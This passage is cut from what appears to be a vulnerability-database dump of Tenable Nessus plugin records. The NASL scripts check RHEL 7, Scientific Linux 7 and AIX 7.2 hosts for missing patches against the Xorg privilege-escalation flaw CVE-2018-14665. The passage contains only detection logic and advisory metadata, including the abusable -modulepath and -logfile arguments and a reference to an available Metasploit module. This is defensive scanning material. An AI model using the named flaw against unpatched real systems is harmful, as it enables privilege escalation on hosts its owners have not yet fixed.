get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.2\", ml:\"02\", patch:\"IJ11549s0a\", package:\"X11.base.rte\", minfilesetver:\"7.2.2.0\", maxfilesetver:\"7.2.2.0\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:15:20", "description": "An update for xorg-x11-server is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nX.Org is an open source implementation of the X Window System. 
It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nSecurity Fix(es) :\n\n* xorg-x11-server: Incorrect permission check in Xorg X server allows\nfor privilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.", "edition": 24, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-31T00:00:00", "title": "RHEL 7 : xorg-x11-server (RHSA-2018:3410)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xwayland", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx"], "id": "REDHAT-RHSA-2018-3410.NASL", "href": "https://www.tenable.com/plugins/nessus/118557", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3410. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118557);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n script_xref(name:\"RHSA\", value:\"2018:3410\");\n script_xref(name:\"IAVB\", value:\"2018-B-0140\");\n\n script_name(english:\"RHEL 7 : xorg-x11-server (RHSA-2018:3410)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for xorg-x11-server is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nX.Org is an open source implementation of the X Window System. 
It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nSecurity Fix(es) :\n\n* xorg-x11-server: Incorrect permission check in Xorg X server allows\nfor privilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-14665\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xwayland\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3410\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xdmx-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xdmx-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", 
reference:\"xorg-x11-server-Xephyr-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xephyr-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xnest-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xnest-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xorg-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xvfb-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xvfb-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xwayland-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xwayland-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-common-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-common-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"xorg-x11-server-devel-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-devel-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xorg-x11-server-source-1.20.1-5.1.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + 
redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T02:49:10", "description": "Security Fix(es) :\n\n - xorg-x11-server: Incorrect permission check in Xorg X\n server allows for privilege escalation (CVE-2018-14665)\n\nThe SL Team added a fix for upstream bug 1650634", "edition": 11, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-27T00:00:00", "title": "Scientific Linux Security Update : xorg-x11-server on SL7.x x86_64 (20181031)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-27T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xwayland", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common"], "id": "SL_20181031_XORG_X11_SERVER_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/119207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119207);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n 
script_name(english:\"Scientific Linux Security Update : xorg-x11-server on SL7.x x86_64 (20181031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - xorg-x11-server: Incorrect permission check in Xorg X\n server allows for privilege escalation (CVE-2018-14665)\n\nThe SL Team added a fix for upstream bug 1650634\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1811&L=scientific-linux-errata&F=&S=&P=806\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88ddb2fe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xwayland\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xdmx-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xephyr-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xnest-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xorg-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xvfb-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xwayland-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"xorg-x11-server-common-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-devel-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"xorg-x11-server-source-1.20.1-5.1.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:15:31", "description": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. 
An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.", "edition": 20, "published": "2018-12-13T00:00:00", "title": "AIX 7.2 TL 3 : xorg (IJ11550)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.2"], "id": "AIX_IJ11550.NASL", "href": "https://www.tenable.com/plugins/nessus/119632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xorg_advisory3.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119632);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/04/25 9:51:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"AIX 7.2 TL 3 : xorg (IJ11550)\");\n script_summary(english:\"Check for APAR IJ11550\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. 
An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID logfile Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! 
get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.2\", ml:\"03\", patch:\"IJ11550s0a\", package:\"X11.base.rte\", minfilesetver:\"7.2.3.0\", maxfilesetver:\"7.2.3.15\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:15:31", "description": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. 
An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.", "edition": 20, "published": "2018-12-13T00:00:00", "title": "AIX 7.2 TL 0 : xorg (IJ11546)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.2"], "id": "AIX_IJ11546.NASL", "href": "https://www.tenable.com/plugins/nessus/119629", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xorg_advisory3.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119629);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/04/25 9:51:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"AIX 7.2 TL 0 : xorg (IJ11546)\");\n script_summary(english:\"Check for APAR IJ11546\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. 
An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID logfile Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! 
